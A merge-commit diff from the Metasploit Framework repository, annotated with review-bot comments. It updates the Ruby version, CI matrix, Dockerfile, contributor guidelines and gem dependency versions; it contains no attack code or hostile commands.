Merge remote-tracking branch 'upstream/master' into land-10812-
commit
5fc7167beb
|
@ -5,6 +5,8 @@ docker-compose*.yml
|
|||
docker/
|
||||
!docker/msfconsole.rc
|
||||
!docker/entrypoint.sh
|
||||
!docker/database.yml
|
||||
Dockerfile
|
||||
README.md
|
||||
.git/
|
||||
.github/
|
||||
|
|
|
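Review bot: un-ignoring `docker/database.yml` here interacts with the Dockerfile change further down that does `COPY --chown=root:metasploit . $APP_HOME/` and then `cp -f $APP_HOME/docker/database.yml` into `config/`, so whatever that file contains now ships inside the image; it must hold only container-local defaults and no real credentials. Keeping `.git/` and `.github/` out of the build context is the right call for the same reason, since the whole context is copied and repository history would otherwise be baked into every layer.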
@ -2,6 +2,8 @@
|
|||
Tell us what this change does. If you're fixing a bug, please mention
|
||||
the github issue number.
|
||||
|
||||
Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
|
||||
|
||||
## Verification
|
||||
|
||||
List the steps needed to make sure this thing works
|
||||
|
|
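Review bot: the new "unique branch" sentence links to a comment on PR 11086 rather than to the `[topic branch]` guidance that CONTRIBUTING.md already carries in this same merge; issue comments are a fragile target for a template every contributor sees, so pointing at CONTRIBUTING.md or the wiki would age better.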
1
.mailmap
1
.mailmap
|
@ -64,7 +64,6 @@ wwebb-r7 <wwebb-r7@github> <William_Webb@rapid7.com>
|
|||
|
||||
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
|
||||
bcoles <bcoles@github> bcoles <bcoles@gmail.com>
|
||||
bcoles <bcoles@github> Brendan Coles <bcoles@gmail.com>
|
||||
bokojan <bokojan@github> parzamendi-r7 <peter_arzamendi@rapid7.com>
|
||||
brandonprry <brandonprry@github> <bperry@brandons-mbp.attlocal.net>
|
||||
brandonprry <brandonprry@github> Brandon Perry <bperry@bperry-rapid7.(none)>
|
||||
|
|
|
@ -1 +1 @@
|
|||
2.5.1
|
||||
2.5.3
|
||||
|
|
12
.travis.yml
12
.travis.yml
|
@ -11,22 +11,23 @@ addons:
|
|||
- graphviz
|
||||
language: ruby
|
||||
rvm:
|
||||
- '2.3.7'
|
||||
- '2.4.4'
|
||||
- '2.5.1'
|
||||
- '2.3.8'
|
||||
- '2.4.5'
|
||||
- '2.5.3'
|
||||
|
||||
env:
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
|
||||
# Used for testing the remote data service
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'
|
||||
|
||||
matrix:
|
||||
fast_finish: true
|
||||
exclude:
|
||||
- rvm: '2.3.7'
|
||||
- rvm: '2.3.8'
|
||||
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
|
||||
- rvm: '2.4.4'
|
||||
- rvm: '2.4.5'
|
||||
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
|
||||
|
||||
jobs:
|
||||
|
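Review bot: the `exclude:` entries were moved from 2.3.7/2.4.4 to 2.3.8/2.4.5 in step with the `rvm:` list, which is necessary: a stale exclude matches nothing, and the `REMOTE_DB=1` jobs would then silently start running on 2.3 and 2.4 as well. Nothing enforces that coupling, so a one-line comment on the exclude block saying these versions must track `rvm:` would save the next bump from that mistake.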
@ -48,6 +49,7 @@ before_install:
|
|||
- ls -la ./.git/hooks
|
||||
- ./.git/hooks/post-merge
|
||||
# Update the bundler
|
||||
- gem update --system
|
||||
- gem install bundler
|
||||
before_script:
|
||||
- cp config/database.yml.travis config/database.yml
|
||||
|
|
|
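Review bot: `- gem install bundler` is unpinned, while Gemfile.lock in this same change records `BUNDLED WITH 1.17.3`; RubyGems will install the newest bundler available, which can be a different major version from the one that wrote the lockfile, and `bundle exec` will then either rewrite the lock or refuse to run. Pin it, for example `- gem install bundler -v '~> 1.17'`, or install the exact version read from the lockfile's `BUNDLED WITH` line.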
@ -37,7 +37,7 @@ when an individual is representing the project or its community.
|
|||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
||||
reported by contacting the project maintainers at msfdev@metasploit.com. If
|
||||
the incident involves a committer, you may report directly to
|
||||
egypt@metasploit.com or todb@metasploit.com.
|
||||
caitlin_condon@rapid7.com or todb@metasploit.com.
|
||||
|
||||
All complaints will be reviewed and investigated and will result in a
|
||||
response that is deemed necessary and appropriate to the circumstances.
|
||||
|
|
114
CONTRIBUTING.md
114
CONTRIBUTING.md
|
@ -1,82 +1,54 @@
|
|||
# Hello, World!
|
||||
|
||||
Thanks for your interest in making Metasploit -- and therefore, the
|
||||
world -- a better place!
|
||||
|
||||
Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
|
||||
Please try to be as specific as you can about your problem; include steps
|
||||
to reproduce (cut and paste from your console output if it's helpful) and
|
||||
what you were expecting to happen.
|
||||
|
||||
Are you about to report a security vulnerability in Metasploit itself?
|
||||
How ironic! Please take a look at Rapid7's [Vulnerability
|
||||
Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
|
||||
your report to security@rapid7.com using our [PGP key].
|
||||
|
||||
Are you about to contribute some new functionality, a bug fix, or a new
|
||||
Metasploit module? If so, read on...
|
||||
world -- a better place! Before you get started, review our
|
||||
[Code of Conduct]. There are mutliple ways to help beyond just writing code:
|
||||
- [Submit bugs and feature requests] with detailed information about your issue or idea.
|
||||
- [Help fellow users with open issues] or [help fellow committers test recent pull requests].
|
||||
- [Report a security vulnerability in Metasploit itself] to Rapid7.
|
||||
- Submit an updated or brand new module! We are always eager for exploits, scanners, and new
|
||||
integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
|
||||
|
||||
# Contributing to Metasploit
|
||||
|
||||
What you see here in CONTRIBUTING.md is a bullet point list of the do's
|
||||
and don'ts of how to make sure *your* valuable contributions actually
|
||||
make it into Metasploit's master branch.
|
||||
|
||||
If you care not to follow these rules, your contribution **will** be
|
||||
closed. Sorry!
|
||||
|
||||
This is intended to be a **short** list. The [wiki] is much more
|
||||
exhaustive and reveals many mysteries. If you read nothing else, take a
|
||||
look at the standard [development environment setup] guide
|
||||
and Metasploit's [Common Coding Mistakes].
|
||||
Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
|
||||
it into Metasploit's master branch. If you do not care to follow these rules, your contribution
|
||||
**will** be closed. Sorry!
|
||||
|
||||
## Code Contributions
|
||||
|
||||
* **Do** stick to the [Ruby style guide].
|
||||
* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
|
||||
* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
|
||||
* **Do** follow the [50/72 rule] for Git commit messages.
|
||||
* **Don't** use the default merge messages when merging from other branches.
|
||||
* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
|
||||
* **Do** create a [topic branch] to work on instead of working directly on `master`.
|
||||
If you do not send a PR from a topic branch, the history of your PR will be
|
||||
lost as soon as you update your own master branch. See
|
||||
https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
|
||||
this in action.
|
||||
|
||||
* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
|
||||
history of your pull request. See [PR#8000] for an example of losing commit history as soon as
|
||||
you update your own master branch.
|
||||
|
||||
### Pull Requests
|
||||
|
||||
* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
|
||||
* **Do** target your pull request to the **master branch**.
|
||||
* **Do** specify a descriptive title to make searching for your pull request easier.
|
||||
* **Do** include [console output], especially for witnessable effects in `msfconsole`.
|
||||
* **Do** list [verification steps] so your code is testable.
|
||||
* **Do** [reference associated issues] in your pull request description.
|
||||
* **Do** write [release notes] once a pull request is landed.
|
||||
* **Don't** leave your pull request description blank.
|
||||
* **Don't** abandon your pull request. Being responsive helps us land your code faster.
|
||||
|
||||
Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
|
||||
Pull request [PR#9966] is a good example to follow.
|
||||
|
||||
#### New Modules
|
||||
|
||||
* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
|
||||
- It would be even better to set up `msftidy.rb` as a [pre-commit hook].
|
||||
* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
|
||||
* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
|
||||
* **Do** use the many module mixin [API]s.
|
||||
* **Don't** include more than one module per pull request.
|
||||
* **Do** include instructions on how to setup the vulnerable environment or software.
|
||||
* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
|
||||
|
||||
|
||||
|
||||
#### Scripts
|
||||
|
||||
* **Don't** submit new [scripts]. Scripts are shipped as examples for
|
||||
automating local tasks, and anything "serious" can be done with post
|
||||
modules and local exploits.
|
||||
* **Do** include [Module Documentation] showing sample run-throughs.
|
||||
* **Don't** submit new [scripts]. Scripts are shipped as examples for automating local tasks, and
|
||||
anything "serious" can be done with post modules and local exploits.
|
||||
|
||||
#### Library Code
|
||||
|
||||
* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
|
||||
* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
|
||||
* **Do** follow [Better Specs] - it's like the style guide for specs.
|
||||
* **Do** write [YARD] documentation - this makes it easier for people to use your code.
|
||||
* **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
|
||||
|
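Review bot: the new bullet near the top references `[help fellow committers test recent pull requests]`, but the only definition in the link list below is `[help fellow committers test recently submitted pull requests]`, so the rendered page will show literal bracketed text instead of a link; make the two identical. In the same paragraph, `mutliple` should be `multiple`.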
@ -84,44 +56,46 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
|
|||
#### Bug Fixes
|
||||
|
||||
* **Do** include reproduction steps in the form of verification steps.
|
||||
* **Do** include a link to any corresponding [Issues] in the format of
|
||||
`See #1234` in your commit description.
|
||||
* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
|
||||
|
||||
## Bug Reports
|
||||
|
||||
* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
|
||||
Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security).
|
||||
|
||||
When reporting Metasploit issues:
|
||||
* **Do** write a detailed description of your bug and use a descriptive title.
|
||||
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
|
||||
* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
|
||||
* **Don't** file duplicate reports; search for your bug before filing a new report.
|
||||
|
||||
If you need some more guidance, talk to the main body of open
|
||||
source contributors over on the [Freenode IRC channel],
|
||||
or e-mail us at the [metasploit-hackers] mailing list.
|
||||
If you need some more guidance, talk to the main body of open source contributors over on our
|
||||
[Metasploit Slack] or [#metasploit on Freenode IRC].
|
||||
|
||||
Also, **thank you** for taking the few moments to read this far! You're
|
||||
already way ahead of the curve, so keep it up!
|
||||
Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
|
||||
curve, so keep it up!
|
||||
|
||||
[Issue Tracker]:http://r-7.co/MSF-BUGv1
|
||||
[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
|
||||
[wiki]:https://github.com/rapid7/metasploit-framework/wiki
|
||||
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
|
||||
[development environment setup]:http://r-7.co/MSF-DEV
|
||||
[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
|
||||
[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
|
||||
[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
|
||||
[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
|
||||
[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
|
||||
[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
|
||||
[development environment]:http://r-7.co/MSF-DEV
|
||||
[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
|
||||
[Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
|
||||
[Rubocop]:https://rubygems.org/search?query=rubocop
|
||||
[50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
|
||||
[topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
|
||||
[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
|
||||
[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
|
||||
[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
|
||||
[reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
|
||||
[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
|
||||
[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
|
||||
[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
|
||||
[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
|
||||
[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
|
||||
[API]:https://rapid7.github.io/metasploit-framework/api
|
||||
[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
|
||||
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
|
||||
[RSpec]:http://rspec.info
|
||||
[Better Specs]:http://betterspecs.org
|
||||
[YARD]:http://yardoc.org
|
||||
[Issues]:https://github.com/rapid7/metasploit-framework/issues
|
||||
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
||||
[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
|
||||
[Metasploit Slack]:https://www.metasploit.com/slack
|
||||
[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
||||
|
|
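Review bot: the link list now defines `[scripts]` twice (once after `[wiki]`, once after `[Module Documentation]`); keep one. Worth a pass as well for definitions whose only uses were removed by the rewrite above (`[Issue Tracker]`, `[PGP key]`, `[Freenode IRC channel]`, `[metasploit-hackers]`) if any of them survive this change, and for the `[Code of Conduct]` target, where a `.md` suffix under `/wiki/` is unusual and should be checked to resolve.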
25
Dockerfile
25
Dockerfile
|
@ -1,12 +1,12 @@
|
|||
FROM ruby:2.5.1-alpine3.7 AS builder
|
||||
FROM ruby:2.5.3-alpine3.7 AS builder
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
||||
ENV APP_HOME /usr/src/metasploit-framework/
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV BUNDLE_IGNORE_MESSAGES="true"
|
||||
WORKDIR $APP_HOME
|
||||
|
||||
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
|
||||
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
|
||||
COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
|
||||
COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
|
||||
COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
|
||||
|
@ -37,26 +37,31 @@ RUN apk add --no-cache \
|
|||
&& chmod -R a+r /usr/local/bundle
|
||||
|
||||
|
||||
FROM ruby:2.5.1-alpine3.7
|
||||
FROM ruby:2.5.3-alpine3.7
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ENV APP_HOME /usr/src/metasploit-framework/
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV NMAP_PRIVILEGED=""
|
||||
ENV METASPLOIT_GROUP=metasploit
|
||||
|
||||
COPY --from=builder /usr/local/bundle /usr/local/bundle
|
||||
COPY . $APP_HOME
|
||||
# used for the copy command
|
||||
RUN addgroup -S $METASPLOIT_GROUP
|
||||
|
||||
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
|
||||
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
|
||||
|
||||
COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
|
||||
COPY --chown=root:metasploit . $APP_HOME/
|
||||
RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
|
||||
|
||||
WORKDIR $APP_HOME
|
||||
|
||||
# we need this entrypoint to dynamically create a user
|
||||
# matching the hosts UID and GID so we can mount something
|
||||
# from the users home directory. If the IDs don't match
|
||||
# it results in access denied errors. Once docker has
|
||||
# a solution for this we can revert it back to normal
|
||||
# it results in access denied errors.
|
||||
ENTRYPOINT ["docker/entrypoint.sh"]
|
||||
|
||||
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
|
||||
CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]
|
||||
|
|
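Review bot: the new `CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]` is exec form, which performs no shell expansion, so unless docker/entrypoint.sh hands its arguments to a shell, msfconsole receives the literal string `$APP_HOME/config/database.yml`; since `WORKDIR $APP_HOME` is set, `"config/database.yml"` avoids the problem. On the privilege side, `setcap cap_net_raw,cap_net_bind_service=+eip` on the ruby binary grants those capabilities to every Ruby process any user starts in the container, not only msfconsole; that is an accepted trade-off for dropping root, but it deserves a comment in the Dockerfile, as does the fact that `RUN cp -f ... database.yml` runs as root after the `--chown=root:metasploit` COPY and relies on the default umask leaving the copied file group-readable.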
2
Gemfile
2
Gemfile
|
@ -3,6 +3,8 @@ source 'https://rubygems.org'
|
|||
# spec.add_runtime_dependency '<name>', [<version requirements>]
|
||||
gemspec name: 'metasploit-framework'
|
||||
|
||||
gem 'sqlite3', '~>1.3.0'
|
||||
|
||||
# separate from test as simplecov is not run on travis-ci
|
||||
group :coverage do
|
||||
# code coverage for tests
|
||||
|
|
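Review bot: `gem 'sqlite3', '~>1.3.0'` adds a direct dependency in the Gemfile while `sqlite3` also appears under the gemspec's PATH specs in Gemfile.lock; if the gemspec still declares it, the version constraint belongs in one place, not both. Style nit: `'~> 1.3.0'` with a space, per the Ruby style guide CONTRIBUTING.md points at.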
123
Gemfile.lock
123
Gemfile.lock
|
@ -1,7 +1,7 @@
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (5.0.0)
|
||||
metasploit-framework (5.0.5)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -9,8 +9,10 @@ PATH
|
|||
bcrypt
|
||||
bcrypt_pbkdf
|
||||
bit-struct
|
||||
concurrent-ruby (= 1.0.5)
|
||||
dnsruby
|
||||
ed25519
|
||||
em-http-request
|
||||
faker
|
||||
filesize
|
||||
jsobfu
|
||||
|
@ -19,9 +21,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.3.52)
|
||||
metasploit-payloads (= 1.3.61)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.4.2)
|
||||
metasploit_payloads-mettle (= 0.5.6)
|
||||
mqtt
|
||||
msgpack
|
||||
nessus_rest
|
||||
|
@ -66,7 +68,6 @@ PATH
|
|||
sinatra
|
||||
sqlite3
|
||||
sshkey
|
||||
sysrandom
|
||||
thin
|
||||
tzinfo
|
||||
tzinfo-data
|
||||
|
@ -79,27 +80,27 @@ GEM
|
|||
remote: https://rubygems.org/
|
||||
specs:
|
||||
Ascii85 (1.0.3)
|
||||
actionpack (4.2.10)
|
||||
actionview (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
actionpack (4.2.11)
|
||||
actionview (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
rack (~> 1.6)
|
||||
rack-test (~> 0.6.2)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||
actionview (4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
actionview (4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
builder (~> 3.1)
|
||||
erubis (~> 2.7.0)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.3)
|
||||
activemodel (4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
activemodel (4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
builder (~> 3.1)
|
||||
activerecord (4.2.10)
|
||||
activemodel (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
activerecord (4.2.11)
|
||||
activemodel (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
arel (~> 6.0)
|
||||
activesupport (4.2.10)
|
||||
activesupport (4.2.11)
|
||||
i18n (~> 0.7)
|
||||
minitest (~> 5.1)
|
||||
thread_safe (~> 0.3, >= 0.3.4)
|
||||
|
@ -118,33 +119,43 @@ GEM
|
|||
builder (3.2.3)
|
||||
coderay (1.1.2)
|
||||
concurrent-ruby (1.0.5)
|
||||
cookiejar (0.3.3)
|
||||
crass (1.0.4)
|
||||
daemons (1.2.6)
|
||||
daemons (1.3.1)
|
||||
diff-lcs (1.3)
|
||||
dnsruby (1.61.2)
|
||||
addressable (~> 2.5)
|
||||
docile (1.3.1)
|
||||
ed25519 (1.2.4)
|
||||
em-http-request (1.1.5)
|
||||
addressable (>= 2.3.4)
|
||||
cookiejar (!= 0.3.1)
|
||||
em-socksify (>= 0.3)
|
||||
eventmachine (>= 1.0.3)
|
||||
http_parser.rb (>= 0.6.0)
|
||||
em-socksify (0.3.2)
|
||||
eventmachine (>= 1.0.0.beta.4)
|
||||
erubis (2.7.0)
|
||||
eventmachine (1.2.7)
|
||||
factory_bot (4.11.1)
|
||||
activesupport (>= 3.0.0)
|
||||
factory_bot_rails (4.11.1)
|
||||
factory_bot (~> 4.11.1)
|
||||
railties (>= 3.0.0)
|
||||
factory_bot (5.0.0)
|
||||
activesupport (>= 4.2.0)
|
||||
factory_bot_rails (5.0.0)
|
||||
factory_bot (~> 5.0.0)
|
||||
railties (>= 4.2.0)
|
||||
faker (1.9.1)
|
||||
i18n (>= 0.7)
|
||||
faraday (0.15.3)
|
||||
faraday (0.15.4)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
filesize (0.2.0)
|
||||
fivemat (1.3.7)
|
||||
hashery (2.1.2)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jsobfu (0.4.2)
|
||||
rkelly-remix
|
||||
json (2.1.0)
|
||||
loofah (2.2.2)
|
||||
loofah (2.2.3)
|
||||
crass (~> 1.0.2)
|
||||
nokogiri (>= 1.5.9)
|
||||
metasm (1.0.3)
|
||||
|
@ -152,12 +163,12 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-credential (3.0.1)
|
||||
metasploit-credential (3.0.3)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models (>= 3.0.0)
|
||||
net-ssh
|
||||
pg (~> 0.15)
|
||||
pg
|
||||
railties
|
||||
rex-socket
|
||||
rubyntlm
|
||||
|
@ -166,39 +177,39 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.3.52)
|
||||
metasploit_data_models (3.0.1)
|
||||
metasploit-payloads (1.3.61)
|
||||
metasploit_data_models (3.0.5)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
arel-helpers
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
pg (= 0.20.0)
|
||||
pg
|
||||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.4.2)
|
||||
method_source (0.9.0)
|
||||
mini_portile2 (2.3.0)
|
||||
metasploit_payloads-mettle (0.5.6)
|
||||
method_source (0.9.2)
|
||||
mini_portile2 (2.4.0)
|
||||
minitest (5.11.3)
|
||||
mqtt (0.5.0)
|
||||
msgpack (1.2.4)
|
||||
msgpack (1.2.6)
|
||||
multipart-post (2.0.0)
|
||||
nessus_rest (0.1.6)
|
||||
net-ssh (5.0.2)
|
||||
net-ssh (5.1.0)
|
||||
network_interface (0.0.2)
|
||||
nexpose (7.2.1)
|
||||
nokogiri (1.8.4)
|
||||
mini_portile2 (~> 2.3.0)
|
||||
octokit (4.12.0)
|
||||
nokogiri (1.10.1)
|
||||
mini_portile2 (~> 2.4.0)
|
||||
octokit (4.13.0)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.1)
|
||||
openssl-ccm (1.2.2)
|
||||
openvas-omp (0.0.4)
|
||||
packetfu (1.1.13)
|
||||
pcaprub
|
||||
patch_finder (1.0.2)
|
||||
pcaprub (0.13.0)
|
||||
pdf-reader (2.1.0)
|
||||
pdf-reader (2.2.0)
|
||||
Ascii85 (~> 1.0.0)
|
||||
afm (~> 0.2.1)
|
||||
hashery (~> 2.0)
|
||||
|
@ -210,11 +221,11 @@ GEM
|
|||
activerecord (~> 4.0)
|
||||
arel (>= 4.0.1)
|
||||
pg_array_parser (~> 0.0.9)
|
||||
pry (0.11.3)
|
||||
pry (0.12.2)
|
||||
coderay (~> 1.1.0)
|
||||
method_source (~> 0.9.0)
|
||||
public_suffix (3.0.3)
|
||||
rack (1.6.10)
|
||||
rack (1.6.11)
|
||||
rack-protection (1.5.5)
|
||||
rack
|
||||
rack-test (0.6.3)
|
||||
|
@ -227,19 +238,19 @@ GEM
|
|||
rails-deprecated_sanitizer (>= 1.0.1)
|
||||
rails-html-sanitizer (1.0.4)
|
||||
loofah (~> 2.2, >= 2.2.2)
|
||||
railties (4.2.10)
|
||||
actionpack (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
railties (4.2.11)
|
||||
actionpack (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
rake (>= 0.8.7)
|
||||
thor (>= 0.18.1, < 2.0)
|
||||
rake (12.3.1)
|
||||
rake (12.3.2)
|
||||
rb-readline (0.5.5)
|
||||
recog (2.1.24)
|
||||
recog (2.1.45)
|
||||
nokogiri
|
||||
redcarpet (3.4.0)
|
||||
rex-arch (0.1.13)
|
||||
rex-text
|
||||
rex-bin_tools (0.1.4)
|
||||
rex-bin_tools (0.1.6)
|
||||
metasm
|
||||
rex-arch
|
||||
rex-core
|
||||
|
@ -250,7 +261,7 @@ GEM
|
|||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.19)
|
||||
rex-exploitation (0.1.20)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
|
@ -290,13 +301,13 @@ GEM
|
|||
rspec-mocks (~> 3.8.0)
|
||||
rspec-core (3.8.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-expectations (3.8.1)
|
||||
rspec-expectations (3.8.2)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-mocks (3.8.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-rails (3.8.0)
|
||||
rspec-rails (3.8.2)
|
||||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
railties (>= 3.0)
|
||||
|
@ -309,7 +320,7 @@ GEM
|
|||
rspec-support (3.8.0)
|
||||
ruby-macho (2.1.0)
|
||||
ruby-rc4 (0.1.5)
|
||||
ruby_smb (1.0.4)
|
||||
ruby_smb (1.0.5)
|
||||
bindata
|
||||
rubyntlm
|
||||
windows_error
|
||||
|
@ -330,19 +341,18 @@ GEM
|
|||
sqlite3 (1.3.13)
|
||||
sshkey (1.9.0)
|
||||
swagger-blocks (2.0.2)
|
||||
sysrandom (1.0.5)
|
||||
thin (1.7.2)
|
||||
daemons (~> 1.0, >= 1.0.9)
|
||||
eventmachine (~> 1.0, >= 1.0.4)
|
||||
rack (>= 1, < 3)
|
||||
thor (0.20.0)
|
||||
thor (0.20.3)
|
||||
thread_safe (0.3.6)
|
||||
tilt (2.0.8)
|
||||
tilt (2.0.9)
|
||||
timecop (0.9.1)
|
||||
ttfunk (1.5.1)
|
||||
tzinfo (1.2.5)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo-data (1.2018.5)
|
||||
tzinfo-data (1.2018.9)
|
||||
tzinfo (>= 1.0.0)
|
||||
warden (1.2.7)
|
||||
rack (>= 1.0)
|
||||
|
@ -351,7 +361,7 @@ GEM
|
|||
activemodel (>= 4.2.7)
|
||||
activesupport (>= 4.2.7)
|
||||
xmlrpc (0.3.0)
|
||||
yard (0.9.16)
|
||||
yard (0.9.18)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
@ -367,9 +377,10 @@ DEPENDENCIES
|
|||
rspec-rails
|
||||
rspec-rerun
|
||||
simplecov
|
||||
